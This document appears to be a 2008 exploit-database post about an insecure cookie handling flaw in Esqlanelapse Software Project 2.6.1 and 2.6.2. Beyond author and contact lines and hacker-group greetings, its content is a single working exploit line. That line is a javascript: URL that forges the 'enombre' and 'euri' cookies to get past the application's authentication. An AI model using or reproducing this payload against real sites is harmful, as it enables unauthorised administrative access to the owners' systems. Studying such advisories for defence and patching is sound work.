Esqlanelapse Software Project 2.6.2 - Insecure Cookie Handling

EDB-ID:

6583


Author:

ZoRLu

Type:

webapps


Platform:

PHP

Date:

2008-09-26


[~] Esqlanelapse Software Project
[~]
[~] version: 2.6.1  & 2.6.2
[~]
[~] Insecure Cookie Handling Vulnerability
[~]
[~] donwload: http://sourceforge.net/project/showfiles.php?group_id=118575&package_id=129141&release_id=519061
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 26.09.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] contact: trt-turk@hotmail.com
[~]
[~] contact: zorlu@w.cn
[~] 
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] -----------------------------------------------------------

Exploit:

javascript:document.cookie = "enombre=nombre; path=/"; document.cookie = "euri=visitor_uri; path=/";

[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke, FaLCaTa, ProgenTR, Ryu, Phantom Orchid, edish, SON-KRAL & all Muslims HaCkeRs
[~]
[~] yildirimordulari.org  &  r00tsecurity.org  &  darkc0de.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2008-09-26]